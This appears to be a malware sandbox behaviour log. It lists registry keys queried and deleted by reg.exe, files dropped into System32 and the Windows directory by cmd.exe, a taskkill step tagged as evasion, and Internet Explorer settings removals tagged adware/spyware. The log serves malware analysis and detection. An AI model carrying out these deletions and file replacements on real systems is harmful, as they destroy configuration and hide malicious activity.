Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\system32\reg.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\ovp_du.exe C:\Windows\system32\cmd.exe N/A
File created C:\Windows\System32\LogonUI.exe C:\Windows\system32\cmd.exe N/A
File created C:\Windows\SysWOW64\* C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Boot\EFI\* C:\Windows\system32\cmd.exe N/A
File created C:\Windows\Windows\System32\LogonUI.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Globalization\ICU\icudtl.dat C:\Windows\system32\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Storport C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\reg.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\system32\reg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\reg.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\reg.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\Restriction Policies\Hashes\487B786451026BAEFD474B8758C058D538EC35CB C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{38F03426-E83B-4E68-B65B-DCAE73304838} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{81361155-FAF9-11D3-B0D3-00C04F612FF1} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{991DA7E5-953F-435B-BE5E-B92A05EDFC42} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FA7C375B-66A7-4280-879D-FD459C84BB02} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7AC06A6F-4C88-4707-8DEC-61017CB50E1E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm5x.dll C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{f5078f21-c551-11d3-89b9-0000f81fe221} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9E797ED0-5253-4243-A9B7-BD06C58F8EF3} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{C08DF07A-3E49-4E25-9AB0-D3882835F153} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0F1BE7F7-45CA-11D2-831F-00A0244D2298} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{314111B8-A502-11D2-BBCA-00C04F8EC294} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SYNC_SETTINGS C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{724D43A0-0D85-11D4-9908-00400523E39A} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{A968A4B4-C492-4834-B651-17602C3885C8} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{B0A08D67-9464-4E73-A549-2CC208AC60D3} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\NOTIFYDOWNLOADCOMPLETE C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Plugins\PluginsPageFriendlyName C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\Restriction Policies\Hashes\6D3BC8D0F5F3DAA9BF40880FD115FE497F2C4AA1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{37B03544-A4C8-11D2-B634-00C04F79498E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7849596a-48ea-486e-8937-a2a3009f31a9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{248DD896-BB45-11CF-9ABC-0080C7E7B78D} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B0A6BAE2-AAF0-11D0-A152-00A0C908DB96} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0F6A72B9-D3C5-4FCE-89A3-4E3D19C3580A} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B9C13CD0-5A97-4C6B-8A50-7638020E2462} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{E94137E0-92ED-4579-9251-18AF2A08CCD1} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{03cb9467-fd9d-42a8-82f9-8615b4223e6e} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0713E8A2-850A-101B-AFC0-4210102A8DA7} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{860bb310-5d01-11d0-bd3b-00a0c911ce86} C:\Windows\system32\reg.exe N/A
